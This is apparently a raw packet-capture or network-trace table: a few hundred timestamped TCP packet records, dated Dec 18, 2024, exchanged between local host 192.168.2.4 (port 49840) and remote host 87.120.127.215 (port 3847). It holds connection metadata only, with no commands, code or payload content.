                                                                                                                                                Dec 18, 2024 19:27:20.281234980 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.281378984 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.281439066 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.282298088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.282450914 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.282510042 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.283421040 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.283550024 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.283606052 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.284609079 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.284754038 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.284996033 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.285757065 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.285872936 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.285923004 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.287133932 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.287261963 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.288244963 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.288301945 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.288310051 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.288357973 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.289283991 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.289510965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.290296078 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.290354013 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.290508032 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.290616035 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.291575909 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.291774035 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.291857958 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.292690039 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.292818069 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.292869091 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.293894053 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.294123888 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.294176102 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.294991970 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.295123100 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.295185089 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.296139956 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.296230078 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.296282053 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.297332048 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.297418118 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.298449039 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.298504114 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.298559904 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.298610926 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.299607992 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.299725056 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.299777031 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.300781965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.300900936 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.300973892 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.301975965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.302093029 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.302154064 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.303105116 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.303195953 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.303267002 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.304384947 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.304497004 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.304557085 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.305406094 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.305531025 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.305581093 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.306662083 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.306766033 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.307749987 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.307797909 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.307873011 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.307929039 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.308938980 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.309072971 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.309119940 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.310055971 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.310183048 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.310234070 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.311268091 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.311302900 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.311398029 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.312370062 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.312422037 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.312478065 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.313532114 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.313723087 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.314673901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.314727068 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.314910889 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.314961910 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.315834045 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.315959930 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.316010952 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.317126989 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.317236900 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.317465067 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.318203926 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.318332911 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.319186926 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.319355965 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.319510937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.319669008 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.320480108 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.320537090 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.320581913 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.321644068 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.321679115 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.321763992 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.322805882 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.322901964 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.322968960 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.323996067 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.324086905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.324151039 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.325099945 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.325268030 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.325324059 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.326253891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.326364040 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.327423096 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.327445984 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.327485085 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.327542067 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.328628063 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.328661919 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.328746080 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.329746008 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.329842091 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.329891920 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.330892086 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.331046104 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.331109047 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.332175016 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.332345963 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.332431078 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.333266973 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.333363056 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.333419085 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.334376097 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.334608078 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.334665060 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.335509062 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.335659027 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.335716963 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.336724043 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.336848974 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.336966038 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.337768078 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.378638029 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.469583988 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.469727993 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.469795942 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.469904900 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.470237017 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.470299006 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.471084118 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.471164942 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.471225977 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.472287893 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.472322941 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.472397089 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.473380089 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.473530054 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.473582983 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.474613905 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.474733114 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.474792004 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.475625038 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.475802898 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.475862980 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.476845026 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.476943970 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.477005005 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.478198051 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.478233099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.478302956 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.479245901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.479361057 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.479612112 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.480434895 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.480568886 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.480623960 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.481390953 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.481570005 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.482397079 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.482647896 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.482783079 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.482841015 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.483731031 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.483891010 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.483937979 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.484843969 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.484930992 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.485455036 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.486012936 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.486217022 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.486265898 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.487207890 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.487348080 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.487498045 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.488503933 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.488539934 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.488598108 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.489456892 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.489631891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.489685059 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.490751982 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.490885019 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.491009951 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.491892099 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.491930008 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.492470026 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.493124008 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.493285894 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.493344069 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.494170904 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.494257927 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.495213032 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.495289087 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.495455027 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.495522976 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.496507883 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.496732950 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.497454882 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.497613907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.497828960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.497903109 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.498866081 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.499099016 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.499161959 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.500138044 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.500170946 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.500219107 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.501219034 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.501358032 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.501420021 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.502677917 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.502859116 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.503010988 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.503529072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.503639936 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.503705025 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.504647970 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.504760981 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.504812002 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.505749941 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.506325960 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.506383896 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.507010937 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.507179976 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.507261038 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.508038044 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.508265018 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.509023905 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.509474039 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.509507895 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.509566069 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.510652065 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.510687113 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.510766029 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.511673927 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.511768103 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.511822939 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.512742996 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.512947083 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.513006926 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.513827085 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.513916016 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.513972044 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.515011072 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.515132904 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.515186071 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.516218901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.516585112 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.516655922 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.517357111 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.517391920 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.517503977 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.518603086 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.518639088 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.519655943 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.519690037 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.519824982 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.519949913 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.521070957 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.521136999 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.521186113 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.521987915 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.522157907 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.522205114 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.523154020 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.523243904 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.523293972 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.524315119 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.524409056 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.524456024 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.525975943 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.526218891 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.526276112 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.526638985 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.526715040 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.526773930 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.527848005 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.528086901 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.528146982 CET498403847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:27:20.529037952 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.529156923 CET38474984087.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:27:20.529211044 CET498403847192.168.2.487.120.127.215
